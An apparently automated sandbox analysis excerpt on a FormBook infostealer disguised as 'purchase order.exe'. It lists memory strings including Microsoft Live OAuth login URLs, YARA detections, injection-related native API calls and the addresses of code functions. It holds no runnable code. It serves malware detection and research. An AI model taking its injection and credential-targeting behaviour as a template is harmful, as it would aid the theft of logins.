                Source: cacls.exe, 00000007.00000002.3519971247.0000000008018000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: cacls.exe, 00000007.00000002.3519971247.0000000008018000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: cacls.exe, 00000007.00000002.3519971247.0000000008018000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: cacls.exe, 00000007.00000002.3519971247.0000000008018000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: cacls.exe, 00000007.00000002.3518525848.00000000043DA000.00000004.10000000.00040000.00000000.sdmp, olMGHvjsNFhNU.exe, 00000008.00000002.3518272812.000000000380A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://codepen.io/uzcho_/pen/eYdmdXw.css
                Source: cacls.exe, 00000007.00000002.3518525848.00000000043DA000.00000004.10000000.00040000.00000000.sdmp, olMGHvjsNFhNU.exe, 00000008.00000002.3518272812.000000000380A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://codepen.io/uzcho_/pens/popular/?grid_type=list
                Source: cacls.exe, 00000007.00000002.3519971247.0000000008018000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: cacls.exe, 00000007.00000002.3519971247.0000000008018000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: cacls.exe, 00000007.00000002.3519971247.0000000008018000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: cacls.exe, 00000007.00000002.3517170394.00000000030B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: cacls.exe, 00000007.00000002.3517170394.00000000030B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: cacls.exe, 00000007.00000002.3517170394.00000000030B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: cacls.exe, 00000007.00000002.3517170394.00000000030B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                Source: cacls.exe, 00000007.00000002.3517170394.00000000030B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: cacls.exe, 00000007.00000002.3517170394.00000000030B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: cacls.exe, 00000007.00000003.2549282230.0000000007FF8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
                Source: cacls.exe, 00000007.00000002.3518525848.00000000046FE000.00000004.10000000.00040000.00000000.sdmp, olMGHvjsNFhNU.exe, 00000008.00000002.3518272812.0000000003B2E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.aapanel.com/new/download.html?invite_code=aapanele
                Source: cacls.exe, 00000007.00000002.3519971247.0000000008018000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/

                E-Banking Fraud

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 3.2.purchase order.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.purchase order.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000007.00000002.3517878264.0000000003250000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.2358562508.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3516914992.0000000002CD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3517932349.00000000032A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.2390943526.0000000004A30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.2360246710.0000000002350000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3518031522.00000000034F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

                System Summary

                barindex
                Initial sample is a PE file and has a suspicious name
                Source: initial sampleStatic PE information: Filename: purchase order.exe
                Source: C:\Users\user\Desktop\purchase order.exeProcess Stats: CPU usage > 49%
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0042CE23 NtClose,3_2_0042CE23
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015A2B60 NtClose,LdrInitializeThunk,3_2_015A2B60
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015A2DF0 NtQuerySystemInformation,LdrInitializeThunk,3_2_015A2DF0
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015A2C70 NtFreeVirtualMemory,LdrInitializeThunk,3_2_015A2C70
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015A35C0 NtCreateMutant,LdrInitializeThunk,3_2_015A35C0
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015A4340 NtSetContextThread,3_2_015A4340
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015A4650 NtSuspendThread,3_2_015A4650
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015A2BF0 NtAllocateVirtualMemory,3_2_015A2BF0
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015A2BE0 NtQueryValueKey,3_2_015A2BE0
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015A2B80 NtQueryInformationFile,3_2_015A2B80
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015A2BA0 NtEnumerateValueKey,3_2_015A2BA0
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015A2AD0 NtReadFile,3_2_015A2AD0
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015A2AF0 NtWriteFile,3_2_015A2AF0
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015A2AB0 NtWaitForSingleObject,3_2_015A2AB0
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015A2D10 NtMapViewOfSection,3_2_015A2D10
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015A2D00 NtSetInformationFile,3_2_015A2D00
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015A2D30 NtUnmapViewOfSection,3_2_015A2D30
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015A2DD0 NtDelayExecution,3_2_015A2DD0
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015A2DB0 NtEnumerateKey,3_2_015A2DB0
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015A2C60 NtCreateKey,3_2_015A2C60
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015A2C00 NtQueryInformationProcess,3_2_015A2C00
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015A2CC0 NtQueryVirtualMemory,3_2_015A2CC0
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015A2CF0 NtOpenProcess,3_2_015A2CF0
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015A2CA0 NtQueryInformationToken,3_2_015A2CA0
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015A2F60 NtCreateProcessEx,3_2_015A2F60
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015A2F30 NtCreateSection,3_2_015A2F30
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015A2FE0 NtCreateFile,3_2_015A2FE0
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015A2F90 NtProtectVirtualMemory,3_2_015A2F90
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015A2FB0 NtResumeThread,3_2_015A2FB0
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015A2FA0 NtQuerySection,3_2_015A2FA0
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015A2E30 NtWriteVirtualMemory,3_2_015A2E30
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015A2EE0 NtQueueApcThread,3_2_015A2EE0
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015A2E80 NtReadVirtualMemory,3_2_015A2E80
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015A2EA0 NtAdjustPrivilegesToken,3_2_015A2EA0
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015A3010 NtOpenDirectoryObject,3_2_015A3010
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015A3090 NtSetValueKey,3_2_015A3090
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015A39B0 NtGetContextThread,3_2_015A39B0
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015A3D70 NtOpenThread,3_2_015A3D70
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015A3D10 NtOpenProcessToken,3_2_015A3D10
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_03584340 NtSetContextThread,LdrInitializeThunk,7_2_03584340
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_03584650 NtSuspendThread,LdrInitializeThunk,7_2_03584650
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_03582B60 NtClose,LdrInitializeThunk,7_2_03582B60
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_03582BF0 NtAllocateVirtualMemory,LdrInitializeThunk,7_2_03582BF0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_03582BE0 NtQueryValueKey,LdrInitializeThunk,7_2_03582BE0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_03582BA0 NtEnumerateValueKey,LdrInitializeThunk,7_2_03582BA0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_03582AD0 NtReadFile,LdrInitializeThunk,7_2_03582AD0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_03582AF0 NtWriteFile,LdrInitializeThunk,7_2_03582AF0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_03582F30 NtCreateSection,LdrInitializeThunk,7_2_03582F30
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_03582FE0 NtCreateFile,LdrInitializeThunk,7_2_03582FE0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_03582FB0 NtResumeThread,LdrInitializeThunk,7_2_03582FB0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_03582EE0 NtQueueApcThread,LdrInitializeThunk,7_2_03582EE0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_03582E80 NtReadVirtualMemory,LdrInitializeThunk,7_2_03582E80
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_03582D10 NtMapViewOfSection,LdrInitializeThunk,7_2_03582D10
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_03582D30 NtUnmapViewOfSection,LdrInitializeThunk,7_2_03582D30
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_03582DD0 NtDelayExecution,LdrInitializeThunk,7_2_03582DD0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_03582DF0 NtQuerySystemInformation,LdrInitializeThunk,7_2_03582DF0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_03582C70 NtFreeVirtualMemory,LdrInitializeThunk,7_2_03582C70
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_03582C60 NtCreateKey,LdrInitializeThunk,7_2_03582C60
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_03582CA0 NtQueryInformationToken,LdrInitializeThunk,7_2_03582CA0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_035835C0 NtCreateMutant,LdrInitializeThunk,7_2_035835C0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_035839B0 NtGetContextThread,LdrInitializeThunk,7_2_035839B0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_03582B80 NtQueryInformationFile,7_2_03582B80
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_03582AB0 NtWaitForSingleObject,7_2_03582AB0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_03582F60 NtCreateProcessEx,7_2_03582F60
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_03582F90 NtProtectVirtualMemory,7_2_03582F90
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_03582FA0 NtQuerySection,7_2_03582FA0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_03582E30 NtWriteVirtualMemory,7_2_03582E30
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_03582EA0 NtAdjustPrivilegesToken,7_2_03582EA0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_03582D00 NtSetInformationFile,7_2_03582D00
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_03582DB0 NtEnumerateKey,7_2_03582DB0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_03582C00 NtQueryInformationProcess,7_2_03582C00
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_03582CC0 NtQueryVirtualMemory,7_2_03582CC0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_03582CF0 NtOpenProcess,7_2_03582CF0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_03583010 NtOpenDirectoryObject,7_2_03583010
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_03583090 NtSetValueKey,7_2_03583090
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_03583D70 NtOpenThread,7_2_03583D70
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_03583D10 NtOpenProcessToken,7_2_03583D10
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_02CF96D0 NtReadFile,7_2_02CF96D0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_02CF97D0 NtDeleteFile,7_2_02CF97D0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_02CF9560 NtCreateFile,7_2_02CF9560
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_02CF9870 NtClose,7_2_02CF9870
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_02CF99D0 NtAllocateVirtualMemory,7_2_02CF99D0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_0341F813 NtMapViewOfSection,7_2_0341F813
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_0341F8BA NtUnmapViewOfSection,7_2_0341F8BA
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 0_2_02353E280_2_02353E28
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 0_2_02356F900_2_02356F90
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 0_2_0235DFB40_2_0235DFB4
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 0_2_04A100060_2_04A10006
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 0_2_04A100400_2_04A10040
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 0_2_04AF52C80_2_04AF52C8
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 0_2_04AF47E80_2_04AF47E8
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 0_2_04AF27680_2_04AF2768
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 0_2_04AF27570_2_04AF2757
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 0_2_068E7E280_2_068E7E28
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 0_2_068E7E190_2_068E7E19
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 0_2_068E5F800_2_068E5F80
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 0_2_068E3FD80_2_068E3FD8
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 0_2_068E44000_2_068E4400
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 0_2_068E7E280_2_068E7E28
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 0_2_068E5B480_2_068E5B48
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 0_2_068E483A0_2_068E483A
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 0_2_068E48480_2_068E4848
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_00418CB33_2_00418CB3
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0040E81C3_2_0040E81C
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_004033303_2_00403330
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_004013E03_2_004013E0
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0042F4733_2_0042F473
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_004024FF3_2_004024FF
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_004104833_2_00410483
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_004025003_2_00402500
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0040E6833_2_0040E683
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_004106A33_2_004106A3
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_00416EB33_2_00416EB3
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_004027043_2_00402704
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0040270F3_2_0040270F
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_004027103_2_00402710
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0040E7CA3_2_0040E7CA
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0040E7D33_2_0040E7D3
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015F81583_2_015F8158
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015601003_2_01560100
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0160A1183_2_0160A118
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_016281CC3_2_016281CC
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_016301AA3_2_016301AA
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_016020003_2_01602000
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0162A3523_2_0162A352
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_016303E63_2_016303E6
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0157E3F03_2_0157E3F0
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_016102743_2_01610274
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015F02C03_2_015F02C0
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015705353_2_01570535
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_016305913_2_01630591
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_016224463_2_01622446
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_016144203_2_01614420
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0161E4F63_2_0161E4F6
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015947503_2_01594750
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015707703_2_01570770
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0156C7C03_2_0156C7C0
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0158C6E03_2_0158C6E0
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015869623_2_01586962
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0163A9A63_2_0163A9A6
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015729A03_2_015729A0
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015728403_2_01572840
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0157A8403_2_0157A840
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0159E8F03_2_0159E8F0
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015568B83_2_015568B8
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0162AB403_2_0162AB40
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_01626BD73_2_01626BD7
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0156EA803_2_0156EA80
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0157AD003_2_0157AD00
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0160CD1F3_2_0160CD1F
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0156ADE03_2_0156ADE0
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_01588DBF3_2_01588DBF
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_01570C003_2_01570C00
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_01560CF23_2_01560CF2
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_01610CB53_2_01610CB5
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015E4F403_2_015E4F40
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_01612F303_2_01612F30
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_01590F303_2_01590F30
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015B2F283_2_015B2F28
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_01562FC83_2_01562FC8
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015EEFA03_2_015EEFA0
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_01570E593_2_01570E59
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0162EE263_2_0162EE26
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0162EEDB3_2_0162EEDB
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_01582E903_2_01582E90
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0162CE933_2_0162CE93
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0163B16B3_2_0163B16B
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0155F1723_2_0155F172
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015A516C3_2_015A516C
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0157B1B03_2_0157B1B0
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0162F0E03_2_0162F0E0
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_016270E93_2_016270E9
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015770C03_2_015770C0
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0161F0CC3_2_0161F0CC
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0155D34C3_2_0155D34C
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0162132D3_2_0162132D
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015B739A3_2_015B739A
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_016112ED3_2_016112ED
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0158B2C03_2_0158B2C0
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0158D2F03_2_0158D2F0
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015752A03_2_015752A0
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_016275713_2_01627571
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0160D5B03_2_0160D5B0
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015614603_2_01561460
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0162F43F3_2_0162F43F
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0162F7B03_2_0162F7B0
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_016216CC3_2_016216CC
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015799503_2_01579950
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0158B9503_2_0158B950
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_016059103_2_01605910
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015DD8003_2_015DD800
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015738E03_2_015738E0
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0162FB763_2_0162FB76
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015ADBF93_2_015ADBF9
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015E5BF03_2_015E5BF0
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0158FB803_2_0158FB80
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_01627A463_2_01627A46
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0162FA493_2_0162FA49
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015E3A6C3_2_015E3A6C
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0161DAC63_2_0161DAC6
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_01611AA33_2_01611AA3
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0160DAAC3_2_0160DAAC
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015B5AA03_2_015B5AA0
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_01627D733_2_01627D73
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_01573D403_2_01573D40
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_01621D5A3_2_01621D5A
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0158FDC03_2_0158FDC0
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_015E9C323_2_015E9C32
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0162FCF23_2_0162FCF2
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0162FF093_2_0162FF09
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_01533FD23_2_01533FD2
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_01533FD53_2_01533FD5
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_01571F923_2_01571F92
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_0162FFB13_2_0162FFB1
                Source: C:\Users\user\Desktop\purchase order.exeCode function: 3_2_01579EB03_2_01579EB0
                Source: C:\Program Files (x86)\JqnOkYlhJiPbEpIEOaFrUkKyQACqOvJuFeBPNQkyoXShIpNPjSfYAaBYjIMBQobzvxajjMOKAMtO\olMGHvjsNFhNU.exeCode function: 6_2_037C03ED6_2_037C03ED
                Source: C:\Program Files (x86)\JqnOkYlhJiPbEpIEOaFrUkKyQACqOvJuFeBPNQkyoXShIpNPjSfYAaBYjIMBQobzvxajjMOKAMtO\olMGHvjsNFhNU.exeCode function: 6_2_037B7BC16_2_037B7BC1
                Source: C:\Program Files (x86)\JqnOkYlhJiPbEpIEOaFrUkKyQACqOvJuFeBPNQkyoXShIpNPjSfYAaBYjIMBQobzvxajjMOKAMtO\olMGHvjsNFhNU.exeCode function: 6_2_037D6BB16_2_037D6BB1
                Source: C:\Program Files (x86)\JqnOkYlhJiPbEpIEOaFrUkKyQACqOvJuFeBPNQkyoXShIpNPjSfYAaBYjIMBQobzvxajjMOKAMtO\olMGHvjsNFhNU.exeCode function: 6_2_037B5F5A6_2_037B5F5A
                Source: C:\Program Files (x86)\JqnOkYlhJiPbEpIEOaFrUkKyQACqOvJuFeBPNQkyoXShIpNPjSfYAaBYjIMBQobzvxajjMOKAMtO\olMGHvjsNFhNU.exeCode function: 6_2_037B5F116_2_037B5F11
                Source: C:\Program Files (x86)\JqnOkYlhJiPbEpIEOaFrUkKyQACqOvJuFeBPNQkyoXShIpNPjSfYAaBYjIMBQobzvxajjMOKAMtO\olMGHvjsNFhNU.exeCode function: 6_2_037B5F086_2_037B5F08
                Source: C:\Program Files (x86)\JqnOkYlhJiPbEpIEOaFrUkKyQACqOvJuFeBPNQkyoXShIpNPjSfYAaBYjIMBQobzvxajjMOKAMtO\olMGHvjsNFhNU.exeCode function: 6_2_037BE5F16_2_037BE5F1
                Source: C:\Program Files (x86)\JqnOkYlhJiPbEpIEOaFrUkKyQACqOvJuFeBPNQkyoXShIpNPjSfYAaBYjIMBQobzvxajjMOKAMtO\olMGHvjsNFhNU.exeCode function: 6_2_037B7DE16_2_037B7DE1
